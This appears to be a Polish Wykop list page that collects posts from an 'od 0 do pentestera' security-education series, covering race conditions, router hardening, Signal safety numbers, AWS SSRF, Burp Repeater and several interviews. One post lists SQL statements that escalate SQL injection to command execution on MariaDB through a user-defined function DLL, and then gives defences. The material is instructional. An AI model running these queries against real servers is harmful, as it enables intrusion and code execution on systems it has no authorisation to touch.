Dodany: 2020-01-24 06:38:27 | Ostatnio wołany: 2020-01-24 06:39:15


Swego czasu na wykopie można było rozdawać więcej plusów niż teoretycznie jest to możliwe.
Jest to przykład ataku race condition – kiedy to wysyłamy do serwera dwa żądania w tym samym czasie i patrzymy jak na nie zareaguje. #od0dopentestera
Szkolnym przykładem tego problemu są kupony rabatowe/karty podarunkowe a w szczególności te, które można wykorzystać tylko raz.
Jak testować taką podatność?
W materiale prezentuję narzędzie Turbo Intruder.
Za jego pomocą można w prosty sposób wysłać kilkanaście tysięcy żądań do serwera.
Całość używa #java chociaż sam interfejs obsługuje się z poziomu #python

Drugi przykład to wysyłka plików w #php w którym pokazuję, że kolejność operacji ma znaczenie.
Przesłane przez użytkownika pliki kopiuję do katalogu zdjęcia.
Następnie sprawdzam rozszerzenie pliku i jeżeli jest inne niż jpg lub gif – usuwam go.
Przy standardowym użytkowaniu operacja usuwania wykonuje się praktycznie natychmiastowo – złośliwy plik nie jest zatem dostępny.
Ale jeżeli wysyłam takich plików tysiące i równocześnie próbuję je otworzyć – wynik może być nieco inny.
Prawidłowy algorytm bowiem nie powinien kopiować plików do katalogu jeśli ich wcześniej nie sprawdził.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#programowanie #bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #swiat #gruparatowaniapoziomu #security #komputery #biznes

Przejdź do wpisu

Dodany: 2020-01-15 05:34:05 | Ostatnio wołany: 2020-01-15 05:36:40


Praktycznie każdy z nas posiada w mieszkaniu router.
Na jakie elementy powinniśmy zwrócić uwagę z punktu widzenia bezpieczeństwa? #od0dopentestera
- wyłącz opcję WPS,
- używaj WPA2 z AES z odpowiednio długim i skomplikowanym hasłem,
- wyłącz UPnP jeżeli go nie potrzebujesz,
- urządzenia IOT podłącz do odseparowanej sieci gościa,
- sprawdź otwarte porty w zakładce port forwarding,
- o ile nie zarządzasz urządzeniem zdalnie wyłącz logowanie do panelu admina z poziomu interfejsu WAN,
- sprawdź ustawienia serwera DNS,
- zaktualizuj oprogramowanie,
- sprawdź listę aktualnie podłączonych urządzeń.

Temat rozwijam w materiale, który dostępny jest na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.
Listę potencjalnych miejsc do sprawdzenia znajdziesz na stronie Router Security.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #biznes #polska #firma #internet #komputery

Przejdź do wpisu

Dodany: 2020-01-13 05:12:55 | Ostatnio wołany: 2020-01-13 05:17:27


Co to jest red teaming? Czym różni się od testu penetracyjnego?
Na te i inne pytania odpowiada Marcin Ludwiszewski - szef zespołu "Cyber" w Deloitte. #od0dopentestera
Zajmuje się testami ofensywnymi, obroną przed atakami oraz definiowaniem długoterminowych planów strategicznych w obrębie cyberbezpieczeństwa.
W rozmowie opowiada o ciekawych sytuacjach ze swojej pracy i używanych narzędziach.
Poruszamy aspekty prawne oraz kwestie finansowe red teamingu.
Dowiesz się na czym polega wstępne rozpoznanie oraz jak najmniejszym kosztem zwiększyć bezpieczeństwo w firmie.
Na koniec informacje o najczęściej popełnianych błędach bezpieczeństwa oraz sposoby na skuteczną edukację pracowników z tego zakresu.

Cały wywiad znajdziesz na:
- Blogu w formie tekstowej
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #biznes #programowanie #polska #firma

Przejdź do wpisu

Dodany: 2019-12-18 08:51:37 | Ostatnio wołany: 2019-12-18 08:57:47


Błędy typu SQL Injection pozwalają na wykonanie nieautoryzowanych zapytań do naszej bazy danych.
Ale co jeszcze można uzyskać za ich pomocą? #od0dopentestera
MariaDB pozwala na zainstalowanie dodatkowych funkcji, tak zwany User-Defined Functions.
Nas interesuje taka, która umożliwia wykonanie kodu na serwerze poprzez zapytanie SQL.
Najpierw sprawdzamy wersje systemu operacyjnego oraz lokalizacje katalogu z rozszerzeniami:

SHOW GLOBAL VARIABLES LIKE '%version%';
SHOW VARIABLES LIKE 'plugin_dir';

Teraz tworzymy nową tabele i kopiujemy do niej treść odpowiedniego pliku:

CREATE TABLE files(content text);
INSERT INTO files VALUES(CHAR(1, 2, 3))

Może on zawierać bajty zerowe, dlatego też korzystamy z funkcji CHAR.
Następny krok to zapis danych z tabeli do poznanego wcześniej katalogu.
Aby było to możliwe użytkownik musi mieć odpowiednie uprawnienia.

SELECT content FROM files INTO DUMPFILE 'C:\\xampp\\mysql\\lib\\plugin\\lib_mysqludf_sys.dll';

Pozostało już tylko zarejestrować nową funkcję i wykorzystać ją do wykonania kodu:

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
SELECT sys_e val("whoami");

(Spacja w zapytaniu powyżej jest tu z powodu usługi anty DDOS na wykopie).
Jak ochronić się przed tym atakiem?
Korzystać z kont, które nie posiadają uprawnień FILE.
Alternatywną opcją jest uruchomienie serwera z dodatkowym parametrem secure_file_priv.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany dodaj się do Mirkolisty.

#programowanie #security #informatyka #it #nauka #technologia #ciekawostki #gruparatowaniapoziomu #bezpieczenstwo #webdev #programista15k #mysql #bazydanych

Przejdź do wpisu

Dodany: 2019-12-12 09:45:34 | Ostatnio wołany: 2019-12-12 09:46:44


Używasz komunikatora Signal ale nie wiesz co to kod zabezpieczenia?
Dostałeś kiedyś komunikat o zmianie numeru bezpieczeństwa i nie wiesz o co chodzi?
Aby nasza komunikacja była prywatna musi być zaszyfrowana.
W dużym skrócie potrzebujemy do tego klucza publicznego i prywatnego.
Problem w tym, że każdy z nas może w dowolnej chwili wygenerować nowy, unikalny klucz.
Jak zatem powiązać osobę po drugiej stronie z jej kluczem aby mieć pewność, że rozmawiamy z nią a nie z kimś, kto się pod nią podszywa?
Rozwiązaniem jest termin TOFU – czyli Trust On First Use - zaufanie przy pierwszym użyciu.

Dodając nowy kontakt Signal automatycznie pobiera jego klucz.
Aplikacja zakłada, że przed pierwszym użyciem zweryfikowaliśmy poprawność kodu zabezpieczenia.
W tym momencie powinniśmy się spotkać na żywo i sprawdzić, czy wyświetlane na naszym telefonie liczby są identyczne z tymi na telefonie kolegi.
Dopiero wtedy transmisję można uznać za bezpieczną.

Niestety, przeinstalowanie aplikacji lub zmiana telefonu powoduje również zmianę kluczy i wyświetlenie wiadomości o zmianie numeru bezpieczeństwa.
W tym momencie powinniśmy ponownie spotkać się z przyjacielem i porównać identyfikatory.
W innym wypadku nie możemy mieć pewności, czy aby ktoś nie próbuje się podszyć pod naszego znajomego.

W realnym życiu takie spotkania mogą się wydać zbytnią przesadą.
Dla większości zastosowań wystarczy zwykła rozmowa telefoniczna.
Najpierw zadajemy pytanie, na które odpowiedź zna jedynie osoba po drugiej stronie.
Po prawidłowej weryfikacji możemy porównać wyświetlane na ekranach numery.
Od teraz możemy traktować nasze wiadomości jako bezpieczne.
Oczywiście do momentu, gdy nasz telefon nie wyświetli informacji o zmianie kodu zabezpieczenia.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#od0dopentestera #bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #prywatnosc

Przejdź do wpisu

Dodany: 2019-11-28 08:03:15 | Ostatnio wołany: 2019-11-28 08:05:04


Jeżeli jesteś #programista15k i używasz #aws to wiesz jak wiele usług jest tam dostępnych. #od0dopentestera
Gdy serwer EC2 musi mieć dostęp do S3 - gdzieś należy przechowywać klucze API.
Zamiast wpisywać je na sztywno do kodu aplikacji - stosuje się EC2 Instance Metadata Service.
Problem pojawia się, gdy użytkownik może podać adres domeny, z której pobieramy i wyświetlamy treść.
W taki sposób może pobrać dane z Metadata Service.
Taki atak nazywamy Server Side Request Forgery.
Aby mu zapobiec konieczne jest filtrowanie danych od użytkownika.

Ale nie każdy o tym wie - stąd nowe rozwiązanie od Amazona - IMDSv2.
W typowej podatności SSRF atakujący kontroluje adres ale nie kontroluje metody, którą jest on pobierany.
Stąd piersza zmiana - żądanie musi być wysłane przy użyciu metody PUT.
Dodatkowo musi również zawierać nagłówek, w którym określamy czas życia tokenu.
Zwrócony ciąg jest naszym kodem, który dołączamy do kolejnych żądań.

Można to porównać do logowania i ciasteczek.
Najpierw serwer sprawdza, czy posiadamy odpowiednie uprawnienia.
W tym wypadku czy możemy używać metody PUT oraz dodawać dodatkowe nagłówki.
Jeżeli tak, zwraca nam token.
Teraz każde kolejne żądanie musi go zawierać - dzięki temu Amazon wie, że nie jesteśmy atakującymi.

Czy zatem to rozwiązanie to rewolucja?
Niekoniecznie. Po pierwsze nie rozwiązuje całkowicie problemu SSRF.
Atakujący, który może wykonać dowolny kod na serwerze, obejdzie to zabezpieczenie.
Po drugie, standardowo działają obie wersje.
Dla zapewnienia bezpieczeństwa konieczne jest przepisanie aplikacji na wersję drugą i wyłączenie obsługi IMDSv1.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#programowanie #bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security

Przejdź do wpisu

Dodany: 2019-11-20 05:12:15 | Ostatnio wołany: 2019-11-20 05:17:09


Jak wygląda praca osoby zajmującej się bezpieczeństwem w banku? #od0dopentestera
Adam Lange pracuje jako VP Head of Cyber Threat Hunting w Standard Chartered Bank.
W wywiadzie opowiada na czym polega threat hunting i co jest najtrudniejsze w tej pracy.
Posłuchasz o metodach działania przestępców oraz dlaczego pakiet Office tak często używany jest do ataków na firmy.
Adam tłumaczy co to jest phishing i gdzie możemy zgłosić złośliwą witrynę.
Rozmawiamy także o wpływie PSD2 na banki oraz o problemie SIM-swap.
Na koniec rada dla osób rozpoczynających swoją karierę i informacja co zrobić jeżeli staliśmy się ofiarą ataku.
Wywiad znajdziesz tu:
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor,
- transkrypcja wywiadu.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #biznes #security #hacking #bank

Przejdź do wpisu

Dodany: 2019-11-14 05:13:46 | Ostatnio wołany: 2019-11-14 05:16:21


Kilka lat temu The Guardian zapytał osoby profesjonalnie zajmujące się bezpieczeństwem, jakich rad udzielają swoim dzieciom aby uchronić je, przed zagrożeniami znajdującymi się w Internecie.
Czy te odpowiedzi dalej są aktualne? #od0dopentestera
1. Jeżeli nie zrobił byś czegoś twarzą w twarz – nie rób tego w Internecie.
Tryb prywatny w przeglądarce nie zapewnia anonimowości.
Wiadomości na zaszyfrowanych komunikatorach są tajne – chyba, że ktoś przekaże je policji.
Cyberprzemoc to wyśmiewanie z wykorzystaniem Internetu.
Może prowadzić do samobójstwa. W 2018 roku próbowało je popełnić 746 nastolatków w wieku 13-18 lat.
2. Z Internetu nic nie ginie
Większość stron nie usuwa żadnych danych a jedynie przestaje je wyświetlać.
W przyszłości mogą one zostać wykorzystane przeciwko nam, chociażby podczas rekrutacji do wymarzonej pracy.
Pliki w chmurze widoczne są jedynie dla nas.
Jednak trzeba pamiętać o potencjalnym wycieku danych.
Każda firma może bowiem stać się celem ataku.
3. Nie przyjmuj darmowych prezentów od nieznajomych
Gry free-to-play są darmowe, ale zachęcają do wydawania pieniędzy w celu przyspieszenia rozgrywki.
Email od obcego – to też swego rodzaju niespodzianka.
Nie powinno się go otwierać, zwłaszcza jeżeli zawiera załącznik.
Nie zawsze walutą są pieniądze, czasami może chodzić o nasze dane.
W przypadku najmłodszych reklamy napędzają sprzedaż zabawek.
4. Bądź z dzieckiem i monitoruj co robi
Uruchamiając ulubioną bajkę na YouTube, nigdy nie wiesz co pojawi się później.
YouTube powoli stara się to zmieniać, ale zapewne minie jeszcze sporo czasu.
Blokady nie zawsze działają, zwłaszcza wśród nastolatków.
Zablokowałeś Facebooka? A czy nie zapomniałeś o narzędziach Google?
Google Docs bowiem może zostać wykorzystany jako interaktywny czat.
Umożliwia współpracę pomiędzy różnymi użytkownikami.
Bycie znajomym na FB nie wystarczy.
Materiały mogą być bowiem publikowane jedynie dla wąskiego grona odbiorców.
5. Monitoruj gry
Na naszym rynku są one oznaczone według systemu PEGI.
Wskazuje on jaki minimalny wiek powinna mieć osoba, która chce grać w daną produkcję.
Oprócz liczby, znajdują się tam również informacje czy w grze pojawiają się narkotyki, przemoc lub też wulgarny język.

Cały materiał znajdziesz na:
- Blogu w formie tekstowej
- Youtube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor.

Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #security #dzieci

Przejdź do wpisu

Dodany: 2019-11-05 05:11:53 | Ostatnio wołany: 2019-11-05 05:13:40


Większość z nas korzysta z Google, Gmaila czy też Chrome'a.
Od bezpieczeństwa tych narzędzi zależy bezpieczeństwo naszych danych. #od0dopentestera
Krzysztof Kotowicz to osoba, która o możliwościach ataków na serwisy internetowe wie wiele - pracuje jako Senior Software Engineer w Google.
W wywiadzie opowiada co to jest XSS i jak przekonać biznes do zainteresowania się tematami związanymi z zabezpieczeniem stron.
Dowiesz się jak działa Trusted Types a także jak wygląda praca podczas tworzenia nowych standardów w przeglądarkach w ramach Security Working Group.
Krzysztof tłumaczy co było jednym z powodów usunięcia z przeglądarki XSS Auditora, który chronił przed atakami XSS.
Zastanawiamy się również jak bezpiecznie umieścić kod HTML pochodzący od użytkownika na naszej stronie.
Jeżeli dopiero zaczynasz swoją karierę zapoznaj się z poradą dla początkujących a także odpowiedzią na pytanie, czy umiejętność programowania jest przydatna.
Ponieważ Krzysztof zajmuje się również przetwarzaniem błędów zgłoszonych do Google, zapytałem go o największe minusy Bug Bounty a także koszty, z których istnienia możemy nie zdawać sobie sprawy.
A jeżeli jesteś nieco bardziej obeznanym z tematem użytkownikiem - dowiedz się więcej o koncepcie script gadget, który umożliwia obejście mechanizmu CSP.
Na koniec rozmawiamy o nowej klasie podatności XS-Leaks, która pozwala na kradzież danych użytkownika w nietypowy sposób.

Wywiad znajdziesz tu:
- YouTube (sygnatury czasowe w opisie pod filmem),
- Spotify,
- Google Podcasts,
- Apple Podcasts,
- Anchor,
- transkrypcja wywiadu.

Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #informatyka #it #nauka #technologia #ciekawostki #podcast #swiat #gruparatowaniapoziomu #biznes #security #hacking

Przejdź do wpisu

Dodany: 2019-10-15 07:50:39 | Ostatnio wołany: 2019-10-15 07:51:16


W pracy #od0dopentestera potrzebujemy narzędzia, które rejestruje i ponownie wykonuje żądania http.
Jednym z nich jest Repeater z pakietu Burp.
Teoretycznie to prosty mechanizm. Po lewej treść żądania a po prawej odpowiedź serwera.
Ale istnieje trochę opcji, których mogłeś nie znać.

1. Żądania przechowywane są w ponumerowanych zakładkach.
Można zmienić ich nazwę klikając na daną zakładkę dwa razy.
2. W rogu zakładki, znajduje się przycisk „X” zamykający naszą pracę.
W najnowszej wersji możliwe jest przywrócenie zamkniętego okna.
Wystarczy użyć prawego przycisku myszy i wybrać „Reopen closed tab”.
3. Wyszukiwarka automatycznie przesuwa tekst odpowiedzi do pierwszego wystąpienia naszego słowa.
Jeżeli ma tak działać również dla nowych żądań – zaznacz „Auto-scroll”, który znajdziesz po kliknięciu w przycisk „+”.
4. W darmowej wersji nie możemy zapisywać naszej pracy w formie projektów.
Można jednak zapisać żądania z narzędzia Repeater do pliku XML.
„Save entire history” schowane jest pod prawym przyciskiem myszy.
Jedna uwaga. Tak zapisanych danych nie można w łatwy sposób przywrócić.
Jest to więc opcja awaryjna w przypadku kryzysowych sytuacji.
5. Chcesz zmienić typ żądania z POST na GET?
Wybierz: „change request method”.
6. Czasami treść żądania musi być zapisana w odpowiedni sposób.
Zamiast spacji – musimy używać znaku „+”.
Możemy skorzystać z dodatkowego modułu „Decoder” aby odpowiednio przekształcić dane.
Szybsza metoda to „URL-encode as you type”, która zmienia znaki podczas ich wpisywania z klawiatury.
7. Jeżeli zastanawiasz się dlaczego nie widzisz treści przekierowań 301 a jedynie ich wynik – musisz zmienić opcję „Follow redirections” znajdującą się w górnym menu „Repeater”.
Burp standardowo podąża za przekierowaniami, a to może przeszkadzać chociażby w poszukiwaniu błędów typu open redirection.
8. W treści żądań znajduje się nagłówek „Content-Length”, informujący serwer ile danych zostanie przesłanych przez użytkownika.
Ta wartość jest automatycznie modyfikowana aby pasowała do przesłanych przez nas informacji.
Chcąc sprawdzić zachowanie serwera dla innych wartości, odznacz „Update Content-Length”.

Moje materiały możesz posłuchać w formie podcastu na Google i Apple Podcasts oraz Spotify i Anchor.
Subskrybuj kanał na YouTube
Masz pytanie na temat bezpieczeństwa? Zadaj je na grupie od 0 do pentestera na Facebooku.
Jeżeli chcesz być wołany do podobnych wpisów na Mirko dodaj się do Mirkolisty.

#bezpieczenstwo #programowanie #informatyka #it #nauka #technologia #ciekawostki #swiat #gruparatowaniapoziomu #biznes #security

Przejdź do wpisu
Założona przez:

KacperSzurek

Osób na liście: 166
Wołań: 77
Lista tagu "od 0 do pentestera" gdzie publikuje informacje na temat szeroko pojętego bezpieczeństwa komputerowego.

Kategoria: Nauka i newsy

Ostatnie wydarzenia (zobacz wszystkie)


2020-01-24 12:22:06
@Edd3k dołączył do listy


2020-01-24 07:26:52
@Gerard_Z_Rumii dołączył do listy


2020-01-24 07:10:19
@LuGo_ dołączył do listy


2020-01-24 06:39:15
@KacperSzurek zawołał do wpisu


2020-01-15 12:35:16
@zwykuy_gracz dołączył(a) do listy


2020-01-15 11:40:26
@szukammamy dołączył do listy


2020-01-15 11:29:44
@wojcieh dołączył do listy


2020-01-15 11:05:09
@Patryk020 dołączył do listy


2020-01-15 09:52:57
@Efremz dołączył do listy


2020-01-15 09:48:20
@RzecznyWunsz dołączył do listy